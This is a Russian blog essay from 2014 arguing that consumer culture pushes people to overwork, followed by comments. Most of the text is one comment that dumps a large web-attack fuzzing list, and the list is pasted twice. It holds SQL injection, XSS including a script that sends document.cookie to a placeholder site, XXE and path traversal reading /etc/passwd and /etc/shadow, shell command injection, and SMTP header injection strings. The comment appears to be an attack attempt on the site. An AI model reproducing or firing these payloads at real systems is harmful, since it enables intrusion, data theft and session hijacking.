О Работе: Мысли в слух
Я шел по супермаркету и увидел акцию, две бутылки кока-колы по цене одной. И тут меня осенил инсайд, которым я взрываю многих присутствующих. Всех людей, которые стремятся к успеху, деньгам и статусу обманули. Тут уже тысячи раз приводились нищетааргументы, которые основывались на ненужности дорогих вещей, но дело даже не в этом. Вот акция с кока-колой. Идет человек по супермаркету и херак две колы по цене одной, и он захотел. Но, когда он шел ему не хотелось. А учитывая, что себестоимость бутылки колы равняется десятой доле цены, то получается, что покупатель ничего не выигрывает, а тратит деньги на ненужный ему продукт. А у компании кока-кола все хорошо, они обернули товар в деньги, получив меньшую, но сиюминутную прибыль. Поехали дальше. Можно работать получая мало денег, можно работать получая много денег. За редким исключением схема такая, что работаешь мало, получаешь мало, а работаешь много получаешь много. У моего друга сейчас проблема, есть три работы, куда его приглашают, везде зарплата 50к, но работать надо круглые сутки, а он хочет найти за 20, но такую, где можно пинать хер, ессно, по его технической специальности. Схема здесь такая, что человека, как и в случае с колой, вынуждают больше работать за деньги, которые ему не нужны. Почему деньги не нужны? Потому что эти ненужные деньги будут покрывать избыточные потребности. Человек с зарплатой 70к будет жрать и носить то же самое, что и человек с зарплатой в 30, проверено на опыте близких знакомых, но сигареты он будет покупать дороже на 10 рублей, куртки дороже на 3-4к, а пиво на 40 рублей. Появятся всякие дебильные желания, вроде покупки пиццы, сходить в боулинг и прочие менеджерорадости. Любому умному человеку, очевидно, что все потребности-излишества созданы для того, чтобы человеку было, куда слить лишние деньги, которые он зарабатывает, тратя свое бесценное время, хотя мог бы работать три дня в неделю и получать удовольствия все остальное время. Подводя итог, была создана система ценностей, которая ориентирована на то, чтобы человек стремился конвертировать свое время эти ценности. Сделано это было с той целью, чтобы человек больше работал и увеличивал мировой и государственный купюрооборот. Миру не нужен рационалист, который хочет работать и отдыхать 50/50, мир хочет айфоном и дорогим автомобилем заставить человека работать дольше и интенсивнее. И, конечно, сейчас появятся люди, которые убедят меня, что айпад нужен и незаменим, но тут все ясно, лучший раб тот, который считает себя свободным, все по Платону.
2014-12-21


Комментарии к статье

Виктор2017-05-21 17:07:21
От работы кони дохнут. Дурака работа любит, а дурак работе рад. Где бы ни работать, лишь бы не работать. Лучше пузо от пива, чем горб от работы. Работа не волк, в лес не убежит.
trh2017-02-27 19:08:23
! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 